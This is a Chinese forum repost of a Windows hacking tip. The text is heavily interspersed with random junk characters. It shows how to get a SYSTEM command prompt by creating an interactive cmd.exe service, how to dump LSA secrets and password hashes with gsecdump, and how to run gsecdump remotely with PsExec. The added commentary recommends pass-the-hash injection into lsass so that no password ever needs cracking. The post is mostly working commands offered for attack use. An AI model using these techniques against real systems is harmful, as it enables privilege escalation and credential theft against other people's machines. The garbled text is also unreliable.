o get a DOS Prompt as NT system:8 T. I+ k. j" {/ f; O
, a/ E, _, i% Z( B* e, TC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact+ H: E. z4 I+ k& ]6 _, j# i" i
[SC] CreateService SUCCESS
4 Z+ |8 L4 O) k' \0 l0 v, r) T5 f& \" h, u
C:\>sc start shellcmdline
+ h" p7 M& t) H9 \# |( j* ^; B* w[SC] StartService FAILED 1053:
* m/ ^# y9 a1 p- a: m% D/ z9 S% [) A6 v1 S6 @" J. Z
The service did not respond to the start or control request in a timely fashion.6 {+ _, x- ^/ F8 i5 y
5 K, `: y8 s: l9 N7 P/ XC:\>sc delete shellcmdline% c. }! w5 O& U. \/ @, }2 r
[SC] DeleteService SUCCESS
4 g6 D' G( S% }! {: G }3 E
$ f- X) y" i, B0 q------------
7 q3 q1 v- E9 @6 Y1 P0 z9 m/ g8 P# ? y. v, B
Then in the new DOS window:
+ i: X( ~* }; f0 e
9 S, Q$ p% g' J b% i" IMicrosoft Windows XP [Version 5.1.2600]( U2 P, M2 ^) z* W6 J/ p
(C) Copyright 1985-2001 Microsoft Corp.- d; F, \3 }( b/ D$ ^9 m& F
/ E: [* K6 D r/ J! o$ K" a5 \C:\WINDOWS\system32>whoami. b. c4 k8 N2 `' x& h6 ^
NT AUTHORITY\SYSTEM
/ d+ a( H! i+ c, ?/ Y
% U" r6 U8 p/ B: ]& O# YC:\WINDOWS\system32>gsecdump -h
+ P/ g4 p- I6 y qgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se): D3 T3 j/ l5 g
usage: gsecdump [options]& m# V J6 S u& z I x" M+ y
* r& u; D8 g% qoptions:
# o! v2 ?% P4 d! Z) t-h [ --help ] show help1 Q3 B9 c- m% F0 H2 v
-a [ --dump_all ] dump all secrets# u- ]2 ~; Z. `- i$ k: e! u" K
-l [ --dump_lsa ] dump lsa secrets
! c$ B8 b, x1 O1 w9 [* [$ E- a-w [ --dump_wireless ] dump microsoft wireless connections
+ B/ a% p, m, U- J. ^' V' V& L0 N4 u-u [ --dump_usedhashes ] dump hashes from active logon sessions
5 Z5 f$ y% S( V) I. U/ @-s [ --dump_hashes ] dump hashes from SAM/AD. q9 p1 [4 i, W
* t5 @0 t# u. Z: JAlthough I like to use:
' t( Q& E/ R5 e8 l3 w3 | c/ M6 |" q" \# m& Q! N) `9 m9 u
PsExec v1.83 - Execute processes remotely
% _/ b! O' u' @1 f a" Z2 CCopyright (C) 2001-2007 Mark Russinovich* E& L& [& [7 g% n8 u2 x* V5 Z: l
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
9 ~: f, D- S" o0 U5 |/ N3 w! `
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
9 B, m! b) u; w7 G" R. }! z
* A8 d. x! k9 Y mto get the hashes from active logon sessions of a remote system.% K1 ~ @1 }/ h5 c' f# A
, p- g P$ E8 L2 ? a
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 [8 Y3 U- b, _2 ]3 k; g% ]
: o" {0 p6 U+ w3 E/ o) }& T提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了." ?5 w, H' Y3 t9 ~
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
{& z. ^: ~9 K( N
+ Y6 T, d3 ?, c我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
u0 V6 i5 w" g4 @ } |
发表于 2012-11-6 21:09:29
收藏
支持
反对